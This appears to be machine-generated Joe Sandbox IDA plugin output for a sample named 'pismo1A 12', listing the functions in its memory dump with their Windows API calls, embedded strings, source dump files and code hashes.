CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0070082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00700837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0070083C

Strings

SOFTWARE\Classes\, xrefs: 0070070E
\CLSID, xrefs: 00700724
\IPC$, xrefs: 00700784

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: d2adfb4593ba3f92ed5fc0639386b9b1c40914a4c0398bdf7808bd971f773b40
Instruction ID: 98cbc07952619a108fbf98ae40bea86ad9c0b5faf3c9919b3635668f953cfc1b
Opcode Fuzzy Hash: d2adfb4593ba3f92ed5fc0639386b9b1c40914a4c0398bdf7808bd971f773b40
Instruction Fuzzy Hash: ED41E876C10229ABDF15EBA4DC959EDB7B9BF04350F548129F901B31A1EB386E04CFA4

Function 00723C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00723C5C
CoInitialize.OLE32(00000000), ref: 00723C8A
CoUninitialize.OLE32 ref: 00723C94
_wcslen.LIBCMT ref: 00723D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00723DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00723ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00723F0E
CoGetObject.OLE32(?,00000000,0073FB98,?), ref: 00723F2D
SetErrorMode.KERNEL32(00000000), ref: 00723F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00723FC4
VariantClear.OLEAUT32(?), ref: 00723FD8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: efb8a052176dfaa1f3780c307f2432312f212d68e27b91b93c1a0818348204bf
Instruction ID: 0fccdbae1fd119ef4e8f2053d6fc6fc9f89a7b06983b7c31fa3b62385ebbdf2d
Opcode Fuzzy Hash: efb8a052176dfaa1f3780c307f2432312f212d68e27b91b93c1a0818348204bf
Instruction Fuzzy Hash: 6DC155B16083159FD700DF28D88492BBBE9FF89744F14491DF98A9B251DB38EE05CB62

Function 00717A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00717AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00717B8F
SHGetDesktopFolder.SHELL32(?), ref: 00717BA3
CoCreateInstance.OLE32(0073FD08,00000000,00000001,00766E6C,?), ref: 00717BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00717C74
CoTaskMemFree.OLE32(?,?), ref: 00717CCC
SHBrowseForFolderW.SHELL32(?), ref: 00717D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00717D7A
CoTaskMemFree.OLE32(00000000), ref: 00717D81
CoTaskMemFree.OLE32(00000000), ref: 00717DD6
CoUninitialize.OLE32 ref: 00717DDC

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: da80d0911b46b777d181d91590a2a662e1a5c4bc461a31cee0d6b5f68df328f0
Instruction ID: 5f2caa4b14e47d6aa8d28aec5fe113e3bb43394e212fdf976c19ac044a58aa10
Opcode Fuzzy Hash: da80d0911b46b777d181d91590a2a662e1a5c4bc461a31cee0d6b5f68df328f0
Instruction Fuzzy Hash: DFC11D75A04109AFDB14DFA8C884DAEBBF9FF48314B148499F4169B261D734EE81CB94

Function 0073541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00735504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00735515
CharNextW.USER32(00000158), ref: 00735544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00735585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0073559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007355AC

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: e22e272857cb044f7f7160e7ab893d10d3d1b5b06c64c22bb5b08d891d5b1450
Instruction ID: 90af93be2cb8b022c471e2b8ac513b0572b6398aff42435419e9a645adb513f4
Opcode Fuzzy Hash: e22e272857cb044f7f7160e7ab893d10d3d1b5b06c64c22bb5b08d891d5b1450
Instruction Fuzzy Hash: AE61AE71900608EFEF11CF54CC85EFE7BB9EB09721F108185F925AB292D7789A80DB60

Function 006FFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006FFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 006FFB08
VariantInit.OLEAUT32(?), ref: 006FFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 006FFB3A
VariantCopy.OLEAUT32(?,?), ref: 006FFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 006FFBA1
VariantClear.OLEAUT32(?), ref: 006FFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 006FFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006FFBCC
VariantClear.OLEAUT32(?), ref: 006FFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006FFBE9

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 20f3b729237dfad8943410177adfc1ce87c93b93e4fd8b438b8ff33ed7d79a96
Instruction ID: e078e6f5603ad9849c64ebcb3b2633accb5d8bd4e1d682895176e0d8dcea8601
Opcode Fuzzy Hash: 20f3b729237dfad8943410177adfc1ce87c93b93e4fd8b438b8ff33ed7d79a96
Instruction Fuzzy Hash: 2F417F75A00219DFDB01DFA4D8549FEBBBAFF48355F008069E906A7261CB34E945CF94

Function 00709C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00709CA1
GetAsyncKeyState.USER32(000000A0), ref: 00709D22
GetKeyState.USER32(000000A0), ref: 00709D3D
GetAsyncKeyState.USER32(000000A1), ref: 00709D57
GetKeyState.USER32(000000A1), ref: 00709D6C
GetAsyncKeyState.USER32(00000011), ref: 00709D84
GetKeyState.USER32(00000011), ref: 00709D96
GetAsyncKeyState.USER32(00000012), ref: 00709DAE
GetKeyState.USER32(00000012), ref: 00709DC0
GetAsyncKeyState.USER32(0000005B), ref: 00709DD8
GetKeyState.USER32(0000005B), ref: 00709DEA

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 57ccbee1011ca9feea5a136210d65e4beda19bcd0e7cecbb5c325b6e9f053f87
Instruction ID: 92f293f097615694c1789cbddde2a3241243b7a725fda32facb2519f65b7909d
Opcode Fuzzy Hash: 57ccbee1011ca9feea5a136210d65e4beda19bcd0e7cecbb5c325b6e9f053f87
Instruction Fuzzy Hash: 2C41B634A447C9E9FF719670C8143B6BEE06B11344F04825ADBC6566C3EBAD9DC8C7A2

Function 0072055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007205BC
inet_addr.WSOCK32(?), ref: 0072061C
gethostbyname.WSOCK32(?), ref: 00720628
IcmpCreateFile.IPHLPAPI ref: 00720636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007206C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007206E5
IcmpCloseHandle.IPHLPAPI(?), ref: 007207B9
WSACleanup.WSOCK32 ref: 007207BF

Strings

Ping, xrefs: 00720676

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 3ec31b98e75854ab93b748f96f3dc48e0972538d28914d1affbe8681a8acd036
Instruction ID: 1f4ed49a9cb1899eae5e6b3ef855c946830810131129e30cceca05b6d3eb42ae
Opcode Fuzzy Hash: 3ec31b98e75854ab93b748f96f3dc48e0972538d28914d1affbe8681a8acd036
Instruction Fuzzy Hash: 2891AB756042119FD720DF25D888F1ABBE1AF84318F1485A9E46A9B7A3C738ED41CFE1

Function 00728CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00728CF3

Part of subcall function 00708E54: _wcslen.LIBCMT ref: 00708E77

_wcslen.LIBCMT ref: 00728D4E
_wcslen.LIBCMT ref: 00728D9C
_wcslen.LIBCMT ref: 00728DDC
_wcslen.LIBCMT ref: 00728E6E

Strings

cdecl, xrefs: 00728D48, 00728D4D
stdcall, xrefs: 00728DD6, 00728DDB
none, xrefs: 00728E65, 00728E6A
winapi, xrefs: 00728D96, 00728D9B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 0f6e200cd89405d6e4af7a3332a021c776df68370e370910cf02b04de1825688
Instruction ID: 06872e39c8b8560d81ce58ebde4335d04ce5b39d2afb3e38ba6e2608555a47fe
Opcode Fuzzy Hash: 0f6e200cd89405d6e4af7a3332a021c776df68370e370910cf02b04de1825688
Instruction Fuzzy Hash: 8551E331A010269BCF54DF68D8409BEB3A6BF64320B21422DE826E72C4DF3ADE40C7D1

Function 0072372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00723774
CoUninitialize.OLE32 ref: 0072377F
CoCreateInstance.OLE32(?,00000000,00000017,0073FB78,?), ref: 007237D9
IIDFromString.OLE32(?,?), ref: 0072384C
VariantInit.OLEAUT32(?), ref: 007238E4
VariantClear.OLEAUT32(?), ref: 00723936

Strings

NULL Pointer assignment, xrefs: 0072381E
Failed to create object, xrefs: 007237E4, 0072389A
Invalid parameter, xrefs: 00723865

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: e184188807775f935faddb8ed534a2b4d80d5e057c6b105a34c638bc95bb82bd
Instruction ID: 1f140a66f901ba3adf75d22ea42fe651205d546bb1909c302e517c8908270e66
Opcode Fuzzy Hash: e184188807775f935faddb8ed534a2b4d80d5e057c6b105a34c638bc95bb82bd
Instruction Fuzzy Hash: A361C0B0608311AFD711DF64D888B5AB7E4EF45715F00490DF9859B291C778EE88CBA6

Function 00738B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

Part of subcall function 006B912D: GetCursorPos.USER32(?), ref: 006B9141
Part of subcall function 006B912D: ScreenToClient.USER32(00000000,?), ref: 006B915E
Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000001), ref: 006B9183
Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000002), ref: 006B919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00738B6B
ImageList_EndDrag.COMCTL32 ref: 00738B71
ReleaseCapture.USER32 ref: 00738B77
SetWindowTextW.USER32(?,00000000), ref: 00738C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00738C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00738CFF

Strings

p#w, xrefs: 00738C71
@GUI_DRAGFILE, xrefs: 00738C9A
@GUI_DROPID, xrefs: 00738C51

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#w
API String ID: 1924731296-3001469106
Opcode ID: 14eb348a0bdf73a6f4996601c367948d9e9f50eafdcfda8a31acb7b243320587
Instruction ID: b5341687aa79529d9299e683c6b4ef86a06adf6ec78cb8b5453c9d2208f437eb
Opcode Fuzzy Hash: 14eb348a0bdf73a6f4996601c367948d9e9f50eafdcfda8a31acb7b243320587
Instruction Fuzzy Hash: DA51AB71104300AFE744EF14CC56FAA77E5FB88754F500A2DF956672A2CB38AD44CB66

Function 00713388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007133CF

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007133F0

Strings

"%s" (%d) : ==> %s:, xrefs: 00713522
Error: , xrefs: 007134D1
^ ERROR , xrefs: 0071349E
Incorrect parameters to object property !, xrefs: 007134AB
"%s" (%d) : ==> %s:%s%s, xrefs: 00713504
Line %d (File "%s"):, xrefs: 00713443, 0071345C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 82e31cc6e4ddad3894bce4bcbb1549b0fd4a39101be819a93aa8c75b5dcaa964
Instruction ID: ed6d138c3b4ab56edce7148075b5cc6fdc3ab87c445aefb6642113da85adfdf2
Opcode Fuzzy Hash: 82e31cc6e4ddad3894bce4bcbb1549b0fd4a39101be819a93aa8c75b5dcaa964
Instruction Fuzzy Hash: 5F51B171900219AADF15FBE4CD46EEEB77AAF05340F208169F50572192EB392F98CF64

Function 0070B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0070B5FC
_wcslen.LIBCMT ref: 0070B608
_wcslen.LIBCMT ref: 0070B64D
_wcslen.LIBCMT ref: 0070B68C
_wcslen.LIBCMT ref: 0070B6C7

Strings

APPEND, xrefs: 0070B6C1, 0070B6C6
REMOVE, xrefs: 0070B602, 0070B607
EXISTS, xrefs: 0070B686, 0070B68B
KEYS, xrefs: 0070B647, 0070B64C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: fc40188086dcc1cd9922ce4b2d55b2b762788f66d9d80785cc3666b0a53e2a3e
Instruction ID: 89ca35bd5fff78b5340541af568d081aafcf514b034fa57b8bdb6bd6253d5a7f
Opcode Fuzzy Hash: fc40188086dcc1cd9922ce4b2d55b2b762788f66d9d80785cc3666b0a53e2a3e
Instruction Fuzzy Hash: B341B832A00127DBCB109F7DC9905BE77E5AFA1754B244329E421D72C4E73ADE81C790

Function 00715393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007153A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00715416
GetLastError.KERNEL32 ref: 00715420
SetErrorMode.KERNEL32(00000000,READY), ref: 007154A7

Strings

INVALID, xrefs: 00715459
UNKNOWN, xrefs: 00715444
READY, xrefs: 00715460, 00715468
READONLY, xrefs: 00715452
NOTREADY, xrefs: 0071544B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 748bff583db323e255dc96ee28856e78d7bc5826458d5af7398b0d8833eee2b1
Instruction ID: 93bb8d85a1fdda8415c42295477e62a0b07ed1eb83275ca903575777937c4282
Opcode Fuzzy Hash: 748bff583db323e255dc96ee28856e78d7bc5826458d5af7398b0d8833eee2b1
Instruction Fuzzy Hash: 74319175A00544DFDB15DF6CC484AEABBB4EB85305F148069E806DB292DB79DDC2CB90

Function 00733C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00733C79
SetMenu.USER32(?,00000000), ref: 00733C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00733D10
IsMenu.USER32(?), ref: 00733D24
CreatePopupMenu.USER32 ref: 00733D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00733D5B
DrawMenuBar.USER32 ref: 00733D63

Strings

0, xrefs: 00733C54
F, xrefs: 00733D4E

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: e9ef6bcc79f4e52a0af9a81768c8dbead1f1f8e0a994d16f872552191ae3b3b5
Instruction ID: 976f7a6cfdd6f2c0672049957f521d7e7493629230e4ed02b9f99a8798f8105d
Opcode Fuzzy Hash: e9ef6bcc79f4e52a0af9a81768c8dbead1f1f8e0a994d16f872552191ae3b3b5
Instruction Fuzzy Hash: 18415A75A01209EFEB24CF64D844EEA7BB5FF49351F144029F946A7361D738AA10CF98

Function 00733A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00733A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00733AA0
GetWindowLongW.USER32(?,000000F0), ref: 00733AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00733AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00733B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00733BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00733BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00733BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00733BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00733C13

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: b40c9b3d6230b53eaee41c653c4d98b7ef231eccf5d3bd65ba042a6881c4ea3c
Instruction ID: a11150e97f13d5b5dbf2ffd50b4b9c74b9a5fdb52fdac4bcf2b3625e6eb90e94
Opcode Fuzzy Hash: b40c9b3d6230b53eaee41c653c4d98b7ef231eccf5d3bd65ba042a6881c4ea3c
